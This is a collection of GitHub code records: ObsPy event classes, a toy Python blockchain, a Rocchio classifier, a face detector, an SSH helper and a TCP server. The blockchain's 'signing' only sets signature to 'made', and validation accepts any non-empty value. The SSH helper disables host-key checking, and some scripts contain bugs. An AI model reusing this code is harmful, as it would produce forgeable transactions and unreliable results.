:class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of StationMagnitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type origin_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param origin_id: Reference to an origin’s ``resource_id`` if the\n StationMagnitude has an associated\n :class:`~obspy.core.event.origin.Origin`.\n :type mag: float\n :param mag: Estimated magnitude.\n :type mag_errors: :class:`~obspy.core.event.base.QuantityError`\n :param mag_errors: AttribDict containing error quantities.\n :type station_magnitude_type: str, optional\n :param station_magnitude_type: See\n :class:`~obspy.core.event.magnitude.Magnitude`\n :type amplitude_id:\n :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param amplitude_id: Identifies the data source of the StationMagnitude.\n For magnitudes derived from amplitudes in waveforms (e.g., local\n magnitude ML), amplitudeID points to publicID in class Amplitude.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param method_id: See :class:`~obspy.core.event.magnitude.Magnitude`\n :type waveform_id: :class:`~obspy.core.event.base.WaveformStreamID`,\n optional\n :param waveform_id: Identifies the waveform stream. This element can be\n helpful if no amplitude is referenced, or the amplitude is not\n available in the context. Otherwise, it would duplicate the waveform_id\n provided there and can be omitted.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: Creation information used to describe author,\n version, and creation time.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__StationMagnitudeContribution = _event_type_class_factory(\n \"__StationMagnitudeContribution\",\n class_attributes=[(\"station_magnitude_id\", ResourceIdentifier),\n (\"residual\", float),\n (\"weight\", float)])\n\n\nclass StationMagnitudeContribution(__StationMagnitudeContribution):\n \"\"\"\n This class describes the weighting of magnitude values from several\n StationMagnitude objects for computing a network magnitude estimation.\n\n :type station_magnitude_id:\n :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param station_magnitude_id: Refers to the resource_id of a\n StationMagnitude object.\n :type residual: float, optional\n :param residual: Residual of magnitude computation.\n :type weight: float, optional\n :param weight: Weight of the magnitude value from class StationMagnitude\n for computing the magnitude value in class Magnitude. Note that there\n is no rule for the sum of the weights of all station magnitude\n contributions to a specific network magnitude. In particular, the\n weights are not required to sum up to unity.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\n__Amplitude = _event_type_class_factory(\n \"__Amplitude\",\n class_attributes=[(\"resource_id\", ResourceIdentifier),\n (\"generic_amplitude\", float, ATTRIBUTE_HAS_ERRORS),\n (\"type\", str),\n (\"category\", AmplitudeCategory),\n (\"unit\", AmplitudeUnit),\n (\"method_id\", ResourceIdentifier),\n (\"period\", float, ATTRIBUTE_HAS_ERRORS),\n (\"snr\", float),\n (\"time_window\", TimeWindow),\n (\"pick_id\", ResourceIdentifier),\n (\"waveform_id\", WaveformStreamID),\n (\"filter_id\", ResourceIdentifier),\n (\"scaling_time\", UTCDateTime, ATTRIBUTE_HAS_ERRORS),\n (\"magnitude_hint\", str),\n (\"evaluation_mode\", EvaluationMode),\n (\"evaluation_status\", EvaluationStatus),\n (\"creation_info\", CreationInfo)],\n class_contains=[\"comments\"])\n\n\nclass Amplitude(__Amplitude):\n \"\"\"\n This class represents a quantification of the waveform anomaly, usually a\n single amplitude measurement or a measurement of the visible signal\n duration for duration magnitudes.\n\n :type resource_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param resource_id: Resource identifier of Amplitude.\n :type force_resource_id: bool, optional\n :param force_resource_id: If set to False, the automatic initialization of\n `resource_id` attribute in case it is not specified will be skipped.\n :type generic_amplitude: float\n :param generic_amplitude: Measured amplitude value for the given\n waveformID. Note that this attribute can describe different physical\n quantities, depending on the type and category of the amplitude. These\n can be, e.g., displacement, velocity, or a period. If the only\n amplitude information is a period, it has to specified here, not in the\n period attribute. The latter can be used if the amplitude measurement\n contains information on, e.g., displacement and an additional period.\n Since the physical quantity described by this attribute is not fixed,\n the unit of measurement cannot be defined in advance. However, the\n quantity has to be specified in SI base units. The enumeration given in\n attribute unit provides the most likely units that could be needed\n here. For clarity, using the optional unit attribute is highly\n encouraged.\n :type generic_amplitude_errors:\n :class:`~obspy.core.event.base.QuantityError`\n :param generic_amplitude_errors: AttribDict containing error quantities.\n :type type: str, optional\n :param type: Describes the type of amplitude using the nomenclature from\n Storchak et al. (2003). Possible values are:\n\n * unspecified amplitude reading (``'A'``),\n * amplitude reading for local magnitude (``'AML'``),\n * amplitude reading for body wave magnitude (``'AMB'``),\n * amplitude reading for surface wave magnitude (``'AMS'``), and\n * time of visible end of record for duration magnitude (``'END'``).\n\n :type category: str, optional\n :param category: Amplitude category. This attribute describes the way the\n waveform trace is evaluated to derive an amplitude value. This can be\n just reading a single value for a given point in time (point), taking a\n mean value over a time interval (mean), integrating the trace over a\n time interval (integral), specifying just a time interval (duration),\n or evaluating a period (period).\n See :class:`~obspy.core.event.header.AmplitudeCategory` for allowed\n values.\n :type unit: str, optional\n :param unit: Amplitude unit. This attribute provides the most likely\n measurement units for the physical quantity described in the\n genericAmplitude attribute. Possible values are specified as\n combinations of SI base units.\n See :class:`~obspy.core.event.header.AmplitudeUnit` for allowed\n values.\n :type method_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param method_id: Describes the method of amplitude determination.\n :type period: float, optional\n :param period: Dominant period in the timeWindow in case of amplitude\n measurements. Not used for duration magnitude. Unit: s\n :type snr: float, optional\n :param snr: Signal-to-noise ratio of the spectrogram at the location the\n amplitude was measured.\n :type time_window: :class:`~obspy.core.event.base.TimeWindow`, optional\n :param time_window: Description of the time window used for amplitude\n measurement. Recommended for duration magnitudes.\n :type pick_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param pick_id: Refers to the ``resource_id`` of an associated\n :class:`~obspy.core.event.origin.Pick` object.\n :type waveform_id: :class:`~obspy.core.event.base.WaveformStreamID`,\n :param waveform_id: Identifies the waveform stream on which the amplitude\n was measured.\n :type filter_id: :class:`~obspy.core.event.resourceid.ResourceIdentifier`\n :param filter_id: Identifies the filter or filter setup used for filtering\n the waveform stream referenced by ``waveform_id``.\n :type scaling_time: :class:`~obspy.core.utcdatetime.UTCDateTime`, optional\n :param scaling_time: Scaling time for amplitude measurement.\n :type scaling_time_errors: :class:`~obspy.core.event.base.QuantityError`\n :param scaling_time_errors: AttribDict containing error quantities.\n :type magnitude_hint: str, optional\n :param magnitude_hint: Type of magnitude the amplitude measurement is used\n for. This is a free-text field because it is impossible to cover all\n existing magnitude type designations with an enumeration. Possible\n values are:\n\n * unspecified magnitude (``'M'``),\n * local magnitude (``'ML'``),\n * body wave magnitude (``'Mb'``),\n * surface wave magnitude (``'MS'``),\n * moment magnitude (``'Mw'``),\n * duration magnitude (``'Md'``)\n * coda magnitude (``'Mc'``)\n * ``'MH'``, ``'Mwp'``, ``'M50'``, ``'M100'``, etc.\n\n :type evaluation_mode: str, optional\n :param evaluation_mode: Evaluation mode of Amplitude.\n See :class:`~obspy.core.event.header.EvaluationMode` for allowed\n values.\n :type evaluation_status: str, optional\n :param evaluation_status: Evaluation status of Amplitude.\n See :class:`~obspy.core.event.header.EvaluationStatus` for allowed\n values.\n :type comments: list of :class:`~obspy.core.event.base.Comment`, optional\n :param comments: Additional comments.\n :type creation_info: :class:`~obspy.core.event.base.CreationInfo`, optional\n :param creation_info: CreationInfo for the Amplitude object.\n\n .. note::\n\n For handling additional information not covered by the QuakeML\n standard and how to output it to QuakeML see the\n :ref:`ObsPy Tutorial `.\n \"\"\"\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod(exclude_empty=True)\n","repo_name":"obspy/obspy","sub_path":"obspy/core/event/magnitude.py","file_name":"magnitude.py","file_ext":"py","file_size_in_byte":16152,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"43363162846","text":"import json\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as patches\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nbasepath = '..\\\\..\\\\image\\\\autotrace\\\\'\r\n\r\ndist_th = 8*10\r\n\r\n\r\nwith open(basepath + 'connect.json', 'r') as f:\r\n tp_info = json.load(f)\r\n\r\nimagedir = basepath + tp_info['reference']['viewed_image']\r\nview_image = cv2.imread(imagedir)\r\n\r\n\r\nexport_filedir = basepath + tp_info['export_filedir']\r\n\r\n\r\n\r\nfor filename, context in tp_info['sample'].items():\r\n data = np.loadtxt(basepath + filename + \".csv\", delimiter = ',')\r\n\r\n plt.figure()\r\n ax = plt.axes()\r\n\r\n plt.title(filename)\r\n plt.scatter(data[:,0], data[:,1])\r\n plt.plot(data[:,0], data[:,1])\r\n for t in data:\r\n ax.add_patch(patches.Rectangle(xy=(t[0]-t[2]/2, t[1]-t[3]/2), width=t[2], height=t[3], fill=False, ec='red'))\r\n\r\n\r\n\r\n plt.imshow(view_image, cmap='gray')\r\n\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"belre/RubberMatching","sub_path":"src/autotrace/connect_plotter.py","file_name":"connect_plotter.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28264023469","text":"from datetime import datetime\nimport json\nimport hashlib\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import PKCS1_v1_5 as pkcs1_15\nimport requests\nfrom urllib.parse import urlparse\nfrom pymongo import MongoClient\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nMONGODB_URI = os.environ['MONGODB_URI'] if os.environ['MONGODB_URI'] else 'mongodb://127.0.0.1:27017'\n\nTIME = lambda :datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S\")\n\nclass Mongo:\n\n def __init__(self):\n self.client = MongoClient(MONGODB_URI) \n self.db = self.client['blockchain']\n\nclass Blockchain(object):\n \n def __init__(self):\n self.conn = Mongo()\n if [x for x in self.conn.db.blocks.find()] != []:\n self.chain = []\n self.loadMongo()\n else:\n self.chain = self.init__chain()\n self.saveBlockMongo(self.chain[0])\n self.pendingTransactions = []\n self.difficulty = 4\n self.minerRewards = 5\n self.blockSize = 20\n\n def __str__(self):\n return \"#\".join(str(block) for block in reversed(self.chain) if self.chain != [])[0:]\n\n def saveBlockMongo(self, block):\n try:\n search = self.conn.db.blocks.find_one({'hash': block.hash})\n if search is None:\n encodedBlock = self.jsonEncodeBlock(block)\n self.conn.db.blocks.insert_one(encodedBlock)\n return True\n except Exception as e:\n return e\n\n def loadMongo(self):\n try:\n chain = self.conn.db.blocks.find()\n for block in chain:\n newBlock = self.jsonDecodeBlock(block)\n self.addBlock(newBlock)\n except Exception as e:\n return e\n\n def jsonDecodeBlock(self, block):\n temp_block = Block([Transaction(block['sender'], block['receiver'], int(block['amount']))], block['time'], block['index'])\n temp_block.hash = block['hash']\n temp_block.previous_hash = block['prevHash']\n return temp_block\n\n def jsonEncodeBlock(self, block):\n JSONblock = {\n 'index': block.index,\n 'hash': block.hash,\n 'prevHash': block.previous_hash,\n 'time': block.time,\n 'sender': block.transactions[0].sender,\n 'receiver': block.transactions[0].receiver,\n 'amount': block.transactions[0].amount\n }\n return JSONblock\n\n def getPendingTransactions(self): \n return \"#\".join(str(transaction) for transaction in self.pendingTransactions)[0:]\n\n def init__chain(self):\n first_block = Block([Transaction('admin', 'Kwstantinos Angelopoulos', 10000)], TIME(), 0)\n first_block.previous_hash = 'None'\n return [first_block]\n\n def getLastBlock(self):\n return self.chain[-1]\n\n def addBlock(self, block):\n if len(self.chain) > 0:\n block.previous_hash = self.getLastBlock().hash\n else:\n block.previous_hash = \"none\"\n self.chain.append(block)\n self.saveBlockMongo(block)\n \n def generate_keys(self):\n key = RSA.generate(2048)\n # private_key = key.export_key()\n # with open('private.pem', 'wb') as private_key_file:\n # private_key_file.write(private_key)\n \n # public_key = key.publickey().export_key()\n # with open('public.pem', 'wb') as public_key_file:\n # public_key_file.write(public_key)\n \n return f\"{key.publickey().export_key().decode('ASCII')}${key.export_key().decode('ASCII')}\"\n \n def get_balance(self, person):\n try:\n balance = 0\n for block in self.chain:\n for transaction in block.transactions:\n if transaction.sender == person:\n balance -= float(transaction.amount)\n if transaction.receiver == person:\n balance += float(transaction.amount)\n return f'{person.title()} balance -> {balance}'\n except Exception as e:\n return e\n\n def isValidChain(self):\n for i in range(1, len(self.chain)):\n prev_block = self.chain[i-1]\n next_block = self.chain[i]\n \n if not next_block.hasValidTransactions() or \\\n next_block.hash != next_block.calculate_hash() or \\\n next_block.previous_hash != prev_block.hash:\n return False\n \n return True\n \n def mineBlock(self, _hash, miner):\n try:\n for transaction in self.pendingTransactions:\n if transaction.hash == _hash:\n newBlock = Block([transaction], TIME(), len(self.chain))\n newBlock.previous_hash = self.getLastBlock().hash\n newBlock.mine(self.difficulty)\n self.addBlock(newBlock)\n self.pendingTransactions = [Transaction(\"Miner Rewards\", miner, self.minerRewards)]\n return 'OK'\n else:\n return 'Error 400!'\n except Exception as e:\n return e\n\n def pendingTransaction(self, miner):\n nPending = len(self.pendingTransactions)\n if nPending <= 1: return False\n else:\n for i in range(0, nPending, self.blockSize):\n end = i + self.blockSize\n if i >= nPending: end = nPending\n blockSlice = self.pendingTransactions[i:end]\n newBlock = Block(blockSlice, TIME(), len(self.chain))\n newBlock.previous_hash = self.getLastBlock().hash\n newBlock.mine(self.difficulty)\n self.chain.append(newBlock)\n self.pendingTransactions = [Transaction(\"Miner Rewards\", miner, self.minerRewards)]\n\n def addTransaction(self, sender, receiver, amount, keyString, senderKey):\n keyByte = keyString.encode(\"ASCII\")\n senderKeyByte = senderKey.encode(\"ASCII\")\n key = RSA.import_key(keyByte)\n senderKey = RSA.import_key(senderKeyByte)\n\n if not sender or not receiver or not amount:\n return False\n \n transaction = Transaction(sender, receiver, amount)\n transaction.signTransaction(key, senderKey)\n\n if not transaction.isValidTransaction():\n return False\n\n self.pendingTransactions.append(transaction)\n return len(self.chain) + 1\n \n def conflicts(self):\n try:\n for i in range(len(self.chain)-1):\n if self.chain[i].hash == self.chain[i+1].hash:\n self.chain.pop(i)\n except Exception as e:\n return e \n\nclass Block(object):\n \n def __init__(self, transactions, time, index):\n self.transactions = transactions\n self.previous_hash = ''\n self.time = time\n self.index = index\n self.nonse = 0\n self.hash = self.calculate_hash()\n\n def __str__(self):\n return f\"{self.index}%{self.hash}%{self.previous_hash}%{self.time}%{self.transactions[0].sender}%{self.transactions[0].receiver}%{self.transactions[0].amount}\"\n\n def calculate_hash(self):\n hashTransactions = \"\"\n\n for transaction in self.transactions:\n hashTransactions += transaction.hash\n \n hashString = str(self.time) + hashTransactions + self.previous_hash + str(self.nonse)\n hashEncoded = json.dumps(hashString, sort_keys=True).encode()\n return hashlib.sha256(hashEncoded).hexdigest()\n \n def hasValidTransactions(self):\n for transaction in self.transactions:\n if not transaction.isValidTransaction():\n return False\n return True\n\n def mine(self, difficulty):\n hashMatch = ''.join([str(i) for i in range(difficulty)])\n \n while self.hash[:difficulty] != hashMatch:\n self.nonse += 1\n self.hash = self.calculate_hash()\n return True\n\n\nclass Transaction(object):\n \n def __init__(self, sender, receiver, amount):\n self.sender = sender\n self.receiver = receiver\n self.amount = amount\n self.time = TIME()\n self.hash = self.calculate_hash()\n self.signature = \"\"\n self.validation = ''\n\n def __str__(self):\n return f\"{self.sender}%{self.receiver}%{self.amount}%{self.time}%{self.hash}%{self.validation}\"\n\n def calculate_hash(self):\n hashString = self.sender + self.receiver + str(self.amount) + str(self.time)\n hashEncoded = json.dumps(hashString, sort_keys=True).encode()\n return hashlib.sha256(hashEncoded).hexdigest()\n\n def isValidTransaction(self):\n if self.hash != self.calculate_hash() or self.sender == self.receiver or \\\n not self.sender or len(self.signature) == 0:\n self.validation = '❌'\n return False\n if self.sender == \"Miner rewards\": \n self.validation = '✔'\n return True\n self.validation = '✔'\n return True\n \n def signTransaction(self, key, senderKey):\n if (self.hash != self.calculate_hash()):\n return False\n if str(key.publickey().export_key()) != str(senderKey.publickey().export_key()):\n return False\n pkcs1_15.new(key)\n self.signature = \"made\"\n return True\n\n\nif __name__ == \"__main__\":\n bchain = Blockchain()\n block = Block([Transaction(\"me\", \"admin\", 100)], TIME(), 1)\n bchain.addBlock(block)\n block = Block([Transaction(\"me\", \"admin\", 1000)], TIME(), 2)\n bchain.addBlock(block)\n block = Block([Transaction(\"admin\", \"me\", 100)], TIME(), 3)\n bchain.addBlock(block)\n print(bchain)\n print(bchain.get_balance(\"admin\"))\n print(bchain.chain[0].mine(4))\n","repo_name":"KonstantinosAng/blockchain-coin","sub_path":"src/backend/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":8731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"10123263330","text":"import numpy as np\n\ndoc_word_mapper = {}\nl_list = []\nindex_dict = {}\nfreq_dict = {}\n\nword_class_mapper = {} # [word, class]: count\nlabel_count_mapper = np.zeros(20)\nclass_docs = {}\ntrain_y = []\n\nwith open('matlab/test.label', 'r') as fp:\n for line in fp:\n label = int(line.strip())\n # its good to point out that doc_id 'n' will have label at 'n-1'th place\n # in simple words doc0 will have label at train_y[0] which will be between 1-20\n train_y.append(label)\n class_docs[label] = class_docs.get(label, 0)\n\ni = 0\nwith open('matlab/test.data', 'r') as fp:\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n if word_id not in l_list:\n index_dict[word_id] = i\n i = i + 1\n l_list.append(word_id)\n\nclass_vector = np.zeros((20, len(l_list)))\nclass_count = np.zeros(20)\n\nprevious_doc = 1\nwith open('matlab/test.data', 'r') as fp:\n temp = np.zeros(len(l_list))\n total_count = 0\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n doc_id = int(doc_id)\n if previous_doc != doc_id:\n class_vector[train_y[int(previous_doc)]-1, :] += (temp/total_count)\n class_count[train_y[int(previous_doc)]-1] += 1\n temp = np.zeros(len(l_list))\n temp[index_dict[word_id]] = int(count)\n total_count = 0\n previous_doc = int(doc_id)\n else:\n temp[index_dict[word_id]] = int(count)\n total_count += int(count)\n\nfor i in range(20):\n class_vector[i] = class_vector[i] / class_count[i]\n\n# TESTING\n\ndef cosine(a, class_vector):\n a=np.array(a)\n class_vector = np.array(class_vector)\n dist = np.zeros(20, dtype=np.float64)\n for i in range(20):\n dist[i] = np.sum(abs(a-class_vector[i]))\n return np.argmin(dist)\n\nprevious_doc = 1\ny_expected = []\nconf_matrix = np.zeros((20, 20))\nwith open('matlab/train.label', 'r') as fp:\n for line in fp:\n y_expected.append(int(line.strip()))\n\ntotal_test_docs = len(y_expected)\ncorrect_classified = 0\n\nwith open('matlab/train.data', 'r') as fp:\n j = 0\n temp = np.zeros(len(l_list))\n total_count = 0\n for line in fp:\n doc_id, word_id, count = line.strip().split(' ')\n\n doc_id = int(doc_id)\n\n if previous_doc != doc_id:\n original = y_expected[int(previous_doc)-1]\n original -= 1 ######## to make range 0-19\n temp = temp / total_count\n predicted = cosine(temp, class_vector)\n\n if (predicted == original):\n correct_classified += 1\n conf_matrix[original][predicted] += 1\n temp = np.zeros(len(l_list))\n previous_doc = doc_id\n\n if word_id not in l_list:\n continue\n temp[index_dict[word_id]] = int(count)\n\nincorrect_classified = total_test_docs - correct_classified\nprint (correct_classified / total_test_docs)\n\n# print (\"Max: \" + int(temp))\n\n## Precision-Recall F-Score\n# print (conf_matrix)\n\nprecision = np.zeros(20)\nrecall = np.zeros(20)\nfor i in range(20):\n temp = 0\n for j in range(20):\n temp += conf_matrix[i][j]\n precision[i] = conf_matrix[i][i] / float(temp)\n\nfor j in range(20):\n temp = 0\n for i in range(20):\n temp += conf_matrix[i][j]\n recall[j] = conf_matrix[j][j] / float(temp)\n\nprint (precision)\nprint (recall)\n\nPrecision = np.average(precision)\nRecall = np.average(recall)\nprint ((Precision, Recall))\n\nF_Measure = (Z * Precision * Recall) / (Precision + Recall)\nprint (F_Measure)","repo_name":"ayushsahu1999/IR_Lab","sub_path":"rochhio.py","file_name":"rochhio.py","file_ext":"py","file_size_in_byte":3566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29460379523","text":"from socket import *\nfrom time import sleep\n\n\n\nHOST = ''\nPORT = 1112\nADDR = (HOST, PORT)\nBUFSIZE = 4096\n\nserv = socket(AF_INET, SOCK_STREAM)\n\nserv.bind((ADDR))\nserv.listen(5)\nserv = socket(AF_INET, SOCK_STREAM)\n\nserv.bind((ADDR))\nserv.listen(5)\n\n\nprint(\"Waiting for connections...\")\n# accept the connection\nconn, addr = serv.accept()\n\nstring = \"Connected\"\nstring_encoded = string.encode()\nconn.send(string_encoded)\nprint(\"...connected!\")\n\nwhile True:\n\n data = conn.recv(1024)\n print(data)\n sleep(0.5)\n decoded = data.decode('utf-8')\n if (decoded == \"quit\\n\"):\n print(\"Shutdown\")\n conn.close()\n break\n # conn.send(data)\n\n # decoded = data.decode('utf-8')\n \n # print(\"Received:\")\n # print(decoded)\n # try:\n # conn.send(data)\n # except BrokenPipeError:\n # print(\"Broken pipe\")\n # if (decoded == \"quit\"):\n # print(\"Shutdown\")\n # conn.close()\n # break","repo_name":"LauriVuori/Embedded-rasbi-ardu-avr-etc","sub_path":"RaspberryProjects/tcpSocket/tcpServer.py","file_name":"tcpServer.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11410465996","text":"# --------------------\r\n# ---- the module ----\r\n# --------------------\r\n\r\nimport cv2\r\nimport mediapipe as mp\r\nimport time\r\n\r\nclass FaceDetection():\r\n def __init__(self, detection_confidence=0.76):\r\n self.detection_confidence = detection_confidence\r\n\r\n self.cap = cv2.VideoCapture(0)\r\n\r\n self.mp_faces = mp.solutions.face_detection\r\n self.faces = self.mp_faces.FaceDetection(self.detection_confidence)\r\n\r\n self.mp_draw = mp.solutions.drawing_utils\r\n \r\n def find_faces(self, img, draw=True):\r\n self.img_rgb = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n self.results = self.faces.process(self.img_rgb)\r\n \r\n bounding_boxes = []\r\n\r\n if draw and self.results.detections:\r\n for id, detection in enumerate(self.results.detections):\r\n bbox_location = detection.location_data.relative_bounding_box\r\n h, w, c = img.shape\r\n bounding_box = int(bbox_location.xmin * w), int(bbox_location.ymin * h), int(bbox_location.width * w), \\\r\n int(bbox_location.height * h)\r\n bounding_boxes.append([id, bounding_box, detection.score])\r\n\r\n img = self.custom_draw(img, bounding_box)\r\n cv2.putText(img, str(int(detection.score[0]*100))+\"%\", (bounding_box[0], bounding_box[1]-10), \\\r\n cv2.FONT_HERSHEY_COMPLEX, 0.7, (33, 10, 89), 2)\r\n\r\n return img, bounding_boxes\r\n \r\n def custom_draw(self, img, bounding_box, lenght=30, thickness=10):\r\n up_left, down_left, w, h = bounding_box\r\n up_right, down_right = up_left + w, down_left + h\r\n\r\n cv2.rectangle(img, bounding_box, (76, 99, 20), 2)\r\n\r\n cv2.line(img, (up_left, down_left), (up_left+30, down_left), (76, 99, 20), thickness)\r\n cv2.line(img, (up_left, down_left), (up_left, down_left+30), (76, 99, 20), thickness)\r\n\r\n cv2.line(img, (up_right, down_right), (up_right-30, down_right), (76, 99, 20), thickness)\r\n cv2.line(img, (up_right, down_right), (up_right, down_right-30), (76, 99, 20), thickness)\r\n\r\n return img\r\n\r\ndef main():\r\n detector = FaceDetection()\r\n cap = cv2.VideoCapture(0)\r\n current_time = 0\r\n previous_time = 0\r\n fps = 0\r\n\r\n while True:\r\n succes, img = cap.read()\r\n current_time = time.time()\r\n img, bounding_boxes = detector.find_faces(img)\r\n fps = int(1/(current_time-previous_time))\r\n previous_time = current_time\r\n cv2.putText(img, str(fps), (5, 35), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 3)\r\n\r\n cv2.imshow(\"Video\", img)\r\n cv2.waitKey(1)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"JekPasan/Face-Tracking-Project","sub_path":"face-detection/face_detection_module.py","file_name":"face_detection_module.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43513854048","text":"import subprocess\nfrom tempfile import NamedTemporaryFile\n\nclass Ssh:\n\n def __init__(self, identity, host, username):\n self.userHostStr = username + '@' + host\n self.ssh_args = [\"ssh\", \"-i\", identity, \"-o\", \"StrictHostKeyChecking=no\"]\n self.sftp_args = [\"sftp\", \"-i\", identity, \"-o\", \"StrictHostKeyChecking=no\"]\n\n def setup_env(self): \n script = \"\"\"@\n@mkdir runner\n@cd runner\n@mkdir build\n@mkdir cache\n@mkdir scripts\n\"\"\"\n self._run_sftp_script(script)\n\n def copy_file(self, src, dst):\n script = \"@put \\\"{}\\\" \\\"{}\\\"\".format(src,dst)\n self._run_sftp_script(script)\n\n def test_connect(self, timeout=30):\n return self.run_command('exit', options=['-o', 'ConnectTimeout={}'.format(timeout)], check=False)\n\n def run_command(self, cmd, options=[], check=True):\n args = list(self.ssh_args)\n args.extend(options)\n args.extend([self.userHostStr, cmd])\n return subprocess.run(args, check=check)\n\n def _run_sftp_script(self, str):\n with NamedTemporaryFile() as f:\n f.write(str.encode('ascii'))\n f.flush()\n \n args = list(self.sftp_args)\n args.extend([\"-b\", f.name, self.userHostStr])\n\n subprocess.run(args, check=True)\n\n","repo_name":"tue-robotics/vm_tools","sub_path":"src/vm_tools/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4244938055","text":"# CONTAINS SCRATCH CODE\n\n# Old column creation functions that I don't use anymore\n\ndef frobenius_norm(r):\n \"\"\"\n Takes in a matrix r and returns its frobenius distance\n from 2 * identity\n \"\"\"\n return np.sqrt(np.sum(np.square(r - 2*np.eye(2))))\n\n\ndef sum_abs_differences(r):\n \"\"\"\n Takes in a matrix r and returns the sum of the element-wise distances\n from 2 * identity\n \"\"\"\n return np.sum(np.absolute(r - 2*np.eye(2)))\n\n\ndef identify_psf_profile(obj):\n \"\"\"\n Takes in a galsim PSF object and returns a tuple\n of its type and relevant parameters\n \"\"\"\n\n # TODO incorporate more types of PSF profiles\n\n if isinstance(obj, galsim.gaussian.Gaussian):\n return ('Gaussian', obj.flux, obj.sigma)\n if isinstance(obj, galsim.moffat.Moffat):\n return ('Moffat', obj.flux, obj.beta, obj.half_light_radius)\n\n\ndef create_psf_parameter_columns(dataframe, object_column_name):\n \"\"\"\n \"\"\"\n dataframe[object_column_name + '_type'] = [identify_psf_profile(obj)[0] for obj in dataframe[object_column_name]]\n\n gauss_flux = []\n gauss_sigma = []\n\n moffat_flux = []\n moffat_beta = []\n moffat_hlr = []\n\n\n for obj in dataframe[object_column_name]:\n profile_tuple = identify_psf_profile(obj)\n profile_type = profile_tuple[0]\n\n if profile_type == 'Gaussian':\n gauss_flux.append(profile_tuple[1])\n gauss_sigma.append(profile_tuple[2])\n\n for lst in [moffat_flux, moffat_beta, moffat_hlr]:\n lst.append(np.nan)\n\n if profile_type == 'Moffat':\n moffat_flux.append(profile_tuple[1])\n moffat_beta.append(profile_tuple[2])\n moffat_hlr.append(profile_tuple[3])\n\n for lst in [gauss_flux, gauss_sigma]:\n lst.append(np.nan)\n\n\n dataframe[object_column_name + '_gaussian_flux'] = gauss_flux\n dataframe[object_column_name + '_sigma'] = gauss_sigma\n dataframe[object_column_name + '_moffat_flux'] = moffat_flux\n dataframe[object_column_name + '_beta'] = moffat_beta\n dataframe[object_column_name + '_half_light_radius'] = moffat_hlr\n\n\ndef apply_metric(dataframe, metric):\n \"\"\"\n Takes in the function metric (that acts on a 2x2 np array)\n and adds a column to the dataframe passed in with that metric applied to\n each row\n \"\"\"\n dataframe[metric.__name__] = list(map(metric, dataframe['R']))\n\n\ndef true_psf_column_gaussian(dataframe):\n\n dataframe['true_psf_sigma'] = list(map(lambda obj: obj.sigma, dataframe['true_psf']))\n return dataframe\n\n\ndef true_psf_column_moffat(dataframe):\n dataframe['true_psf_fwhm'] = list(map(lambda obj: obj.fwhm, dataframe['true_psf']))\n\n\ndef gal_psf_ratio_gaussian(dataframe):\n\n dataframe['gal_sigma'] = list(map(lambda gal: gal.sigma, dataframe['original_gal']))\n dataframe['gal_psf_ratio'] = dataframe['gal_sigma'] / dataframe['true_psf_sigma']\n\n return dataframe\n\n\ndef gal_psf_ratio_moffat(dataframe):\n dataframe['gal_fwhm'] = list(map(lambda gal: gal.fwhm, dataframe['original_gal']))\n dataframe['gal_psf_ratio'] = dataframe['gal_fwhm'] / dataframe['true_psf_fwhm'] \n\n# Old plotting functions that I don't need anymore\ndef r_vs_calshearmag(dataframe):\n\n # test plotting R closeness to 2I vs. calibration shear magnitude\n grouped_by_dg = dataframe.groupby('dg1').mean()\n grouped_by_dg = grouped_by_dg[['frobenius_norm', 'sum_abs_differences']] # don't need to include dg1 because that's the table\n print(grouped_by_dg.index.name) # accessing name of variable indexed by\n print(grouped_by_dg.index.values) # to access the variable grouped by, need to do df.index.values\n\n fig, axs = plt.subplots(1, 1)\n\n frob = axs.scatter(grouped_by_dg.index.values, grouped_by_dg['frobenius_norm'])\n sumdif = axs.scatter(grouped_by_dg.index.values, 